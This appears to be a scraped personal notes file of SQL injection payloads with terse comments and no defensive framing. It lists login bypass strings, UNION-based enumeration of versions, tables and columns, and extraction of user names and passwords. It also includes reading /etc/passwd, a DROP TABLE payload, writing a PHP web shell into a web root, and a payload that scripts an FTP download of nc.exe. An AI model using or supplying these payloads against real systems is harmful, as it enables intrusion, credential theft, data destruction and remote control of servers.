44 lines
1.6 KiB
44 lines
1.6 KiB
![]() |
SQLi notes
Login bypass
any' or 1=1 limit 1 ;#
' OR '1' = '1 / ' OR '1' = '1
;# ;-- #
?id=737 order by 6 --> Testing max columns
?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database
?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits?
?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration
?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration
?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info
More examples
x%') #
x%') or 1=1 #
x%') order by 4 #
x%') union select all 4 #
x%') union select all 1,2,3@@version #
x%') and 1=1 #
x%') and UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) #
x%') and drop table if exists customers #
x%') and create database test #
wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value"
Adding backdor.php
?id=737 union select all 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
Getting a shell with php execute
| union select all 1,2,3,4,"<? system('echo open 21 > ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo bin >> ftp.txt'); ?><? system('echo GET nc.exe >> ftp.txt'); ?><? system('echo bye >> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php'